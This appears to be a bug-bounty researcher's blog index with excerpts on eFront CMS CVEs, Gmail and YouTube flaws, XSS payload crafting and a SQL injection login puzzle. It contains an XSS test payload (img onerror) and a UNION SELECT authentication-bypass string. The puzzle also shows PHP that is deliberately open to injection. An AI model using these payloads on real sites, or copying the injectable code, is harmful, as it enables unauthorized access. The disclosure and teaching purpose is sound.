Mohan Kallepalli's

Hi friends, I am back with Three stories Today. There are multiple critical bugs effecting the e-front, one of the Top 10 e-learing cms available, version 3.6.15.4 build 18023. The details are as follows. Directory Traversal       ( CVE : 2015-4461 ) Local File Inclusion      ( CVE : 2015-4462 ) Bypass for Blocked extension file uploads      ( CVE : 2015-4463 ) About the e-front:   E-front is one of the Top 10 e-learning cms available free on the market till date. A small description from the vendor's site: "The core of eFront is distributed as an open-source project. We have created a superior training product and we are not afraid to let you try it! The open-source edit of eFront will cover a wide range of your needs. If you are looking for a specialized solution then take a look at different efront editions ." The Issues are fixed as part of new release, efront v3.6.15.5 build 18024. You can find the chan...

How I was able to send a mail with Your Email Id? Is it possible? Yes. It is. If you are using Gmail, until yesterday, I can send email with your email id. Do u want to know how? Read my story then.... Hi Friends, This is Mohan Kallepalli, again with another bug in gmail ... Thanks to facebook, another day started with frustration. I will tell u that story another time. Anyway, with the frustration on facebook, i turned my focus to my favorite Google one more time. While I was going through the Gmail settings, thanks to my low speed internet, my browser suggested me to use "Basic HTML". Once i opened my settings in Basic HTML, i went to Accounts section and there i saw the functionality for adding another users email id to your " send email as " list. This functionality is protected by a verification code authentication mechanism. which means, Gmail will send a verification code (9digits) to the target email id and you need to enter that code in your v...

Hi Guys, Another bug in Google.. This time is with youtube.com Hmm.. Found a bug in Youtube.. but unfortunately, this bug is out of scope.. Anyway, a bug is a bug.. Lets see.. The issue is an URL redirection vulnerability that existing in upload.youtube.com. When you upload a video which is not proper (invalid), the application redirects you to error URL. This URL is being sent to the server as a parameter, error_redirect . I tried changing the url to some random domain, and guess what, it redirected as i have uploaded an invalid video. Then, in the request i observed there are two user specific tokens going to the server. They are nothing but anti-csrf tokens and working properly with a valid video. But in the case of an invalid video, they are no longer validated and are being ignored. So i tried to send the request with invalid file, but this time i removed the user specific tokens user_token and session_token . And as i expected, the application issued an 302 redirection...

Hey Guys, Today I would like to show you, how i was able to create custom XSS payloads based on existing javascripts in various websites. Note that this write-up does not show you how to get XSS in various websites, but it covers various ways to create custom xss payloads. The approach i follow to create a successful xss payload involves in 3 steps. 1. Analyse the native code 2. Construct the correct syntax 3. Execute the payload For explanation purpose i considered GET based user input, however, this method will work on POST method also. 1. Analyse : This stage involves the analysis of the web-page code in which we are creating a payload. It is important that the main limitation in this stage is that, the user input we entering should be returned in between script tags. index.php?name=test  should return the payload as follows. <script> ........... .. test .. ........... </script> If the user input is not rendering in bet...

Hey Guys, This bug i reported a longback and fixed now. Lets jump into the story. In GMAIL settings general tab, there is an option for creating an automatic mail responder, in case if we go on a vacation and if we dont want to be disturbed. While going through gmail, like all the others, i also ignored that feature and tried here and there. At the same time one of my goood friend @iampr3m was also testing Gmail and he was trying hard to find something in the same settings page. However that guy begin his testing from the top and testing in the Signature feature. So i started testing the settings page from bottom and i got lucky to have the vacation responder in the bottom of the page. So, while testing, I observed that the vacation message is going in between a div tag. So as usual, i used a simple payload with img tag (   <img src=a onerror=alert(1)>  ) to test my luck. As soon as the payload entered with < and >, the server invalidat...

Simple Login Page Bypass Using SQLi.. The following code is being used in a login check page. Find the proper credentials for getting a successful authentication alert. $result = mysql_query($sql); if(mysql_num_rows($result) == 0){ echo "<script>alert('failed')</script>"; } else { $res = mysql_fetch_array($result); if($res[2]==$pwd&&((!$res[7])&&($res[3]))) { echo "<script>alert('success');</script>"; } else { echo "<script>alert('failed');</script>"; } } Find USERNAME & PASSWORD or find the answers here username : ' UNION SELECT 'TEST','FOR','SQLI',1,'N','USER','NAME',0 -- - password : SQLI